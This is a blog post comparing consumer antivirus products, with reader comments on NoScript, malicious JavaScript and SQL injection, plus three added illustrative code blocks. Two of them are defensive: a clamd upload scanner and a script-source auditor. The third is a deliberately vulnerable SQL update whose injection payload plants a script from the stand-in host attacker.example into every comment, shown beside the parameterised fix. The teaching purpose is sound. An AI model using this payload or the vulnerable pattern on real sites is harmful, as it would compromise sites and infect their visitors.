A short discourse on Anti-Virus products…

A lot of my blog posts start as discussions on Facebook and then grow into something I think may have general-audience appeal. This post started that way, as a discussion on cleaning a system after an infection, and has since evolved into a discussion/review of anti-virus products.

My baseline security is Windows Firewall combined with MSE, plus the NoScript and AdBlocker filters in Firefox and just AdBlocker in Chrome. I only use IE for the RVCC site and some Microsoft corporate contacts. Once you get a basic install up and running you should image it, and use that image as the baseline for future restores. I run full-system images on a monthly basis, with snapshots of some of the mission-critical stuff (some directories are on every-4-hour replication!).

Free AV = generally loss-leader advertising for the full product; MSE is the only real-time freeware AV I know of which does not function as beggarware (nagging the user to upgrade). Clam-AV doesn’t make the grade as a real-time AV, as it is a batch scanner only.

MSE = Microsoft Security Essentials = free (as in beer) basic antivirus protection; low impact on host system; does its job quietly without a lot of fuss.

Clam-AV = batch-mode anti-virus scanner; no real-time component; thus it is useful as a recovery tool, or on a mail or web server to scan uploaded items before they are accepted.
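As an added illustration (not code from the original post), here is how a web or mail server would hand an upload to a running clamd daemon for a verdict before accepting it, using clamd's INSTREAM command: the NUL-terminated command, then length-prefixed chunks, then a zero-length chunk, and a reply of the form `stream: OK` or `stream: <signature> FOUND`. The socket path is the Debian/Ubuntu default and is an assumption; adjust it for your install.

```python
"""Scan uploaded bytes by streaming them to clamd (INSTREAM protocol).

Added example, not part of the original post.  Assumption: the socket
path below is the Debian/Ubuntu default for clamd; other installs differ.
"""
import socket
import struct

CLAMD_SOCKET = "/var/run/clamav/clamd.ctl"   # assumption: Debian/Ubuntu default
CHUNK_SIZE = 8192                            # stay well under StreamMaxLength


def frame_instream(data: bytes, chunk_size: int = CHUNK_SIZE) -> bytes:
    """Build the zINSTREAM request for `data`.

    Wire format: b"zINSTREAM\\0", then chunks of <4-byte big-endian length>
    <bytes>, terminated by a zero-length chunk.
    """
    out = bytearray(b"zINSTREAM\0")
    for off in range(0, len(data), chunk_size):
        chunk = data[off:off + chunk_size]
        out += struct.pack("!I", len(chunk)) + chunk
    out += struct.pack("!I", 0)
    return bytes(out)


def parse_clamd_reply(reply: bytes) -> tuple:
    """Map clamd's NUL-terminated reply to (verdict, detail).

    Replies look like b"stream: OK\\0", b"stream: Eicar-Test-Signature FOUND\\0"
    or b"stream: <reason> ERROR\\0".  Anything unparseable is reported as an
    error: an upload must never be published on an unknown verdict.
    """
    text = reply.rstrip(b"\0").decode("utf-8", "replace")
    if text == "stream: OK":
        return "clean", ""
    prefix, _, rest = text.partition(": ")
    if prefix == "stream" and rest.endswith(" FOUND"):
        return "infected", rest[: -len(" FOUND")]
    if prefix == "stream" and rest.endswith(" ERROR"):
        return "error", rest[: -len(" ERROR")]
    return "error", text


def scan_bytes(data: bytes, sock_path: str = CLAMD_SOCKET) -> tuple:
    """Stream `data` to clamd over its UNIX socket and return (verdict, detail)."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.settimeout(60)
        s.connect(sock_path)
        s.sendall(frame_instream(data))
        reply = b""
        while not reply.endswith(b"\0"):
            part = s.recv(4096)
            if not part:            # clamd closed early: treated as an error
                break
            reply += part
    return parse_clamd_reply(reply)


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        verdict, detail = scan_bytes(fh.read())
    print(verdict, detail)
```

The upload handler should keep the file outside the served directory until `scan_bytes` returns `"clean"`; an `"error"` verdict (including a closed socket or a stream over clamd's size limit) is a reason to reject, not to accept by default.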

The rest of these comments reflect my experience with the paid versions of AV products. I have or have had paid subscriptions with all of the following:

AVG = big, bloated, really trying to outdo Norton and McAfee for useless but cute features, and growing more expensive all the time.

Avast = cute but often behind the times on virus definitions; starts begging for renewal at the 40% mark; gets hyper over normal traffic when using the firewall product.

Norton = McAfee = Trend Micro = bloatware. The fact that all of these require a special “removal tool” to uninstall cleanly should suffice as a warning not to get these products.

Kaspersky = when it works, it works well. When it works. And therein lies the problem and the reason I can’t recommend it.

Zone Alarm = when it first came out, this was a decent product. BUT the company had no real business plan and eventually sold out to Check Point, who turned it into the hyperactive scareware typical of most consumer firewalls. IF properly configured it works well, at least until it is broken by the next update.


9 thoughts on “A short discourse on Anti-Virus products…”

  1. I have a theory that the hyperactiveness of some malware products is just a strategy of the above-named “beggarware”. They prompt the user as much as possible to make themselves known and to scare the user into thinking they’re doing their job and doing it well, and that they couldn’t last a minute on a computer without its protection. Perhaps even convincing the user to upgrade to more protection, like the email and web surfing security that most products offer in paid versions.

  2. NoScript is a default install for you? I hope you don’t block all javascript because you’re missing out on some of the finer points of the interwebs! I don’t even have Flash installed on my MacBook Air, as I like my battery more than annoying Flash ads, and although I started it as a test to see how long I would last, I really don’t miss it. Now that I think about it, since I started building on the web I haven’t used/installed AdBlocker either.

    I use MSE on just about everything now because it is free, it’s lightweight, doesn’t take up many processes, has quick scans from the tray bar (it’s the little things sometimes), and generally works well. Is it the best AV out there? No, probably not; however, I am no authority.

  3. @Frank – I run NoScript as a default; when I approach a new site I do a quick check to see where the javascript is coming from – if it’s all local or from known hosts then I hit the “approve for all” and reload.

    The default behaviour of everything off has saved me from infection countless times – especially on self-hosted wordpress or typepad blogs – where the local admin may not understand how to spot or protect from SQL-injection infections.

    AdBlocker does some of the same thing – it can block malware via banner ads (if they’re null-routed they can’t infect) and I tend to auto-block flash until I can see where it’s sourcing from.

    Just because I’m paranoid doesn’t mean they’re not out to get me.

  4. @Bill – Can you give me an example of what you mean by, “The default behaviour of everything off has saved me from infection countless times” — maybe I am a bit naive here, but I cannot remember what types of infections are coming from javascript being turned on and would like to look into them!

    Yeah, you are being a bit paranoid, I think. I can see the logic in looking to see where files are coming from, but if I use Google’s CDN to pull jQuery from, is that a flag in your head?

    On a similar topic I was asking a question on Quora, Is Malwarebytes’ Anti-Malware worth purchasing?

    I have used it for free and appreciate it most out of the few Spyware and Malware removal tools I use (the few I use being SUPER Anti-Spyware, Microsoft Security Essentials, & Spybot Search & Destroy) and am considering purchasing it for scheduling, automatic updates & other features.

    The answers I got were interesting, but none led down the path I was trying to go. One post was a general answer about A\V vs. Spyware scanners and we got into a discussion about bloatware Internet Security Suites, where I stood my ground saying they were ‘too much’ for most people. He had a good argument too, though. =)

  5. I trust Google’s repositories – I do NOT trust javascript from the .cn domain, or .ua or .ru or several other places. (The country codes above are China, Ukraine and Russia, but there are many others I distrust).

    There are LOTS of Javascript vectors for attack – but typically the malware constructs an iframe and then pops up a misleading message, leading the user to click, with the click-event set to download malware. Note if an iframe is used the entire client screen can now be defined as the “accept” button…

    Another approach is to make a simple API call to find out if there are other tabs loaded, and examine contents thereof, or to transmit back cookies, or other nasty surprises. Javascript is often used for malware delivery – why do you think NoScript exists in the first place?

    For further reading, here is a new article: http://nakedsecurity.sophos.com/2011/02/13/hacking-the-web-hijacking-search-results/ – and note this attack vector is nearly a year old.

    ———————————————-

    So far as Malwarebytes Anti-Malware: I have purchased one license although I consider it more of a donation as the product has been worthwhile as an after-the-fact cleanup tool in a number of cases. It’s not something I would routinely install.
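The check described in the two comments above (where is each script coming from, trust the local host and Google’s CDN, distrust certain country-code domains) can be scripted. The following is an added example and not code from the original post or its commenters; the sample page, the trusted-host list and the distrusted-ccTLD list are constructed/illustrative and stand in for whatever lists you actually maintain.

```python
"""Audit where a page's scripts come from, mirroring the manual NoScript
check in the comments.  Added example, not from the original post.
Assumptions: SAMPLE_HTML is a constructed page; TRUSTED_HOSTS and
DISTRUSTED_TLDS are illustrative lists taken from the comments.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

TRUSTED_HOSTS = {"ajax.googleapis.com"}   # assumption: the "Google's CDN" case
DISTRUSTED_TLDS = {"cn", "ru", "ua"}      # the ccTLDs named in the comment

# Constructed sample page: one local script, one from Google's CDN,
# one protocol-relative script from a .ru host, and one inline block.
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>
<script src="//stats.example.ru/c.js"></script>
<script>var inlineCounter = 1;</script>
</head><body></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect external script sources and count inline script blocks."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = 0

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self.inline += 1


def classify(src: str, page_url: str) -> str:
    """Resolve `src` against the page URL and bucket it by host."""
    host = (urlsplit(urljoin(page_url, src)).hostname or "").lower()
    page_host = (urlsplit(page_url).hostname or "").lower()
    if host == page_host:
        return "first-party"
    if host in TRUSTED_HOSTS:
        return "trusted-cdn"
    if host.rsplit(".", 1)[-1] in DISTRUSTED_TLDS:
        return "distrusted"
    return "third-party"


def audit(html: str, page_url: str) -> tuple:
    """Return ({script src: bucket}, inline script count) for the page."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    return {src: classify(src, page_url) for src in p.external}, p.inline


def approve_for_all(report: dict) -> bool:
    """The comment's 'approve for all' rule: only if every external script
    is first-party or from a trusted host.  Anything else stays blocked
    until a human has looked at it."""
    return all(v in ("first-party", "trusted-cdn") for v in report.values())


if __name__ == "__main__":
    report, inline = audit(SAMPLE_HTML, "https://blog.example.com/post")
    for src, bucket in report.items():
        print(f"{bucket:12s} {src}")
    print(f"inline script blocks: {inline}")
    print("approve for all:", approve_for_all(report))
```

This reproduces the commenter’s rule of thumb and nothing more: a host being on the trusted list says where the script is served from, not what it contains, so a compromised or hijacked site on a trusted host would pass this check.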

  6. There are LOTS of Javascript vectors for attack – but typically the malware constructs an iframe and then pops up a misleading message, leading the user to click, with the click-event set to download malware. Note if an iframe is used the entire client screen can now be defined as the “accept” button…

    – yes but you are not the typical user, which is why I am poking. =)

    Why do you think NoScript exists in the first place?

    – I actually don’t know anymore because I honestly don’t read up on security as much as I used to. I thought, rather innocently, that most of the reasons NoScript existed a decade ago were problems that have since been solved elsewhere. Thanks for the link though, going to read up a little now. =D

    ___________________________________________

    If Malwarebytes Anti-Malware did a great job at preventing spyware/adware then it would be worth the purchase. If it does a much better job at removing after the fact vs. preventing, it probably wouldn’t be worth the purchase (this was what I was hoping to get out of that discussion).

    By the way — for some reason I am not getting email notifications despite the first confirmation email telling me I have signed up for “[x] Notify me of follow-up comments via email.” I am now just going to attempt “[x] Subscribe by email to this site” to see what that does, if anything at all.

  7. I don’t know how wordpress.com handles notifications – this is my only shot at using the freebie hosted version of wordpress – good luck with that.

    NoScript originated to fix basic bad Javascript. But it has hung on due to the rash of SQL-injection infections – it really is easy to get infected on a drive-by basis – especially for unwary users who blandly click “OK” to anything to get going.

    SQL-injection is the reason to go back and make sure all the infrastructure code is up-to-date and you’ve followed recommendations for security – otherwise a remote program can force-feed undesired code into your site.
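The mechanism behind that warning, as an added example rather than code from the original post or its commenters: a query built by string splicing lets a visitor rewrite the SQL, so an “edit my own comment” request can append a script tag to every comment the site serves. The table, its two rows and the attacker host are constructed; the hardened version is the same statement with bound parameters.

```python
"""String-built UPDATE beside its parameterised fix, against an in-memory
SQLite table standing in for a blog's comments table.
Added example, not from the original post.  Constructed: the schema, the
two rows, and the attacker host in PAYLOAD.
"""
import sqlite3

ROWS = [(1, "alice", "First!"), (7, "mallory", "hello")]   # constructed data

# Mallory "edits" comment 7 with this body.  Spliced into the SQL text it
# closes the string literal, appends a script tag to *every* row via
# `|| body ||`, and comments out the ownership check that follows.
# (attacker.example is a hypothetical host.)
PAYLOAD = (
    "' || body || '<script src=\"http://attacker.example/ur.js\"></script>'"
    " WHERE 1=1 --"
)


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT)")
    db.executemany("INSERT INTO comments VALUES (?, ?, ?)", ROWS)
    db.commit()
    return db


def vulnerable_edit(db, user: str, cid: int, body: str) -> int:
    """Deliberately vulnerable: user-controlled text becomes part of the SQL."""
    sql = (f"UPDATE comments SET body = '{body}' "
           f"WHERE id = {int(cid)} AND author = '{user}'")
    cur = db.execute(sql)
    db.commit()
    return cur.rowcount        # with PAYLOAD this touches every row


def safe_edit(db, user: str, cid: int, body: str) -> int:
    """Hardened: the SQL is fixed, values are bound as parameters.  The
    payload is stored as plain text, and only in Mallory's own row."""
    cur = db.execute(
        "UPDATE comments SET body = ? WHERE id = ? AND author = ?",
        (body, cid, user),
    )
    db.commit()
    return cur.rowcount


def bodies(db) -> dict:
    return dict(db.execute("SELECT id, body FROM comments ORDER BY id"))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable rows changed:", vulnerable_edit(db, "mallory", 7, PAYLOAD))
    print(bodies(db))
    db = make_db()
    print("safe rows changed:", safe_edit(db, "mallory", 7, PAYLOAD))
    print(bodies(db))
```

Binding parameters stops the statement from being rewritten; it does not make the stored text safe to render. Mallory’s own comment still contains a literal `<script>` tag after `safe_edit`, so output encoding when the page is built is a separate control, not something the database fix provides.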

  8. In reference to anti-virus protection, I have purchased 3 licenses of the Norton 360 security product. I am very happy so far with it in protecting my computers. It is easy to load and use; also, it backs up my system weekly.
    I am going to look into the security products you have discussed, mainly MSE.

  9. @Martin Musial – Norton A/V has to be less resource-hungry than it used to be; however, I still hold strong that it takes up way too many resources on boot and therefore slows down your computer. This is coming from a former tech, though, so I am sure I am biased. =D
